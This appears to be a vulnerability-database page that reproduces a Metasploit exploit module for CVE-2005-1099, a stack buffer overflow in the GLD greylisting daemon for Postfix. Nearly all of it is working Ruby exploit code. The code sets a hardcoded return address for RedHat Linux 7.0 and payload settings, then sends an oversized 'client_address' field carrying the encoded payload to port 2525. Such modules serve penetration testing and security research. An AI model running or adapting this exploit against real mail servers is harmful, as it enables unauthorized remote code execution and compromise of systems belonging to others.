GLD (Greylisting Daemon) Postfix Buffer Overflow

2008-06-0702:16:34

aushack <[email protected]>

www.rapid7.com

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

JSON

This module exploits a stack buffer overflow in the Salim Gasmi GLD <= 1.4 greylisting daemon for Postfix. By sending an overly long string the stack can be overwritten.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'		=> 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
      'Description'	=> %q{
        This module exploits a stack buffer overflow in the Salim Gasmi
        GLD <= 1.4 greylisting daemon for Postfix. By sending an
        overly long string the stack can be overwritten.
      },
      'Author'	=> [ 'aushack' ],
      'Arch'		=> ARCH_X86,
      'Platform'	=> 'linux',
      'References'	=>
        [
          [ 'CVE', '2005-1099' ],
          [ 'OSVDB', '15492' ],
          [ 'BID', '13129' ],
          [ 'EDB', '934' ]
        ],
      'Privileged'	=> true,
      'License'	=> MSF_LICENSE,
      'Payload'	=>
        {
          'Space' => 1000,
          'BadChars' => "\x00\x0a\x0d\x20=",
          'StackAdjustment' => -3500,
        },
      'Targets'	=>
        [
          [ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
        ],
      'DefaultTarget'	=> 0,
      'DisclosureDate'  => '2005-04-12'
    ))

    register_options(
      [
        Opt::RPORT(2525)
      ],
      self.class
    )
  end

  def exploit
    connect

    sploit = "sender="+ payload.encoded + "\r\n"
    sploit << "client_address=" + [target['Ret']].pack('V') * 300 + "\r\n\r\n"

    sock.put(sploit)
    handler
    disconnect

  end
end